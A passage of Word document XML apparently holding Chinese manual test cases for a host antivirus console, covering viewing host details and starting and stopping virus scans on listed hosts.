            </w:r>
          </w:p>
          <w:p w14:paraId="5E7030B5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67CD017C" wp14:editId="3EBED7F3">
                  <wp:extent cx="4104005" cy="1626870"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="24130"/>
                  <wp:docPr id="552" name="图片 552" descr="C:\Users\PC-2\AppData\Local\Temp\15294879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PC-2\AppData\Local\Temp\1529487942(1).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4104005" cy="1626870"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="110974D6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A6F6051" wp14:editId="5DCED180">
                  <wp:extent cx="4104005" cy="1920875"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="9525"/>
                  <wp:docPr id="37" name="图片 37" descr="C:\Users\PC-2\AppData\Local\Temp\15294879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PC-2\AppData\Local\Temp\1529487965(1).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4104005" cy="1920875"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D3EA7E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="15AA6F43" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CDA09FC"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73BDDD23" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看列表中一个主机的详细信息</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>包括主机在线状态</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查杀日志</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>以及其他对主机的操作</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55D98AB0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2CBAF335" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467B1157"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7A5512B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B11091B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="394" w:name="_Toc36487981"/>
      <w:r w:rsidRPr="00536672">
        <w:t>开始</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描主机病毒</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39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31A7BDD0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="779703E8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="777DD6D6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>开始</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>扫描主机病毒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="7581F425" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B29A7F6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="581D4236" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>对列表中的主机进行病毒扫描。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2DB35426" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15802A2D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70DEC834" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="489B05DC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53B006F3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23078D9E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D0AB1B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击列表中一个主机的“查杀操作”中的开始按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27411A4E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>或者点击主机“详细信息”进入详情页面，点击“开始扫描按钮”。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="079AE09B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6247FFAD" wp14:editId="7F288A6D">
                  <wp:extent cx="4104005" cy="1583690"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="16510"/>
                  <wp:docPr id="553" name="图片 553" descr="C:\Users\PC-2\AppData\Local\Temp\1529488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PC-2\AppData\Local\Temp\1529488128(1).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4104005" cy="1583690"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BA74B9C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51537E18" wp14:editId="0B193A5C">
                  <wp:extent cx="4104005" cy="1977390"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="3810"/>
                  <wp:docPr id="554" name="图片 554" descr="C:\Users\PC-2\AppData\Local\Temp\1529488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PC-2\AppData\Local\Temp\1529488152(1).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4104005" cy="1977390"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0C8D71" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4866FFF3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E3CB2A4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="799E4917" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>成功开始扫描某个主机的病毒</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="501E49FE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3275EC36" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70F3B2C6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35097D0D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="395" w:name="_Toc36487982"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终止扫描主机病毒</w:t>
      </w:r>
      <w:bookmarkEnd w:id="395"/>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833"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="148454E2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="480F2527"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标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0811234F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>终止扫描主机病毒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="472B0ECE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33B92B02" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61B3BB73" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>手工测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4C645E43" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59E3E17B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="164E1410" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5BA78431" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41810FE0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F4ACE8F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43E2F0AE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
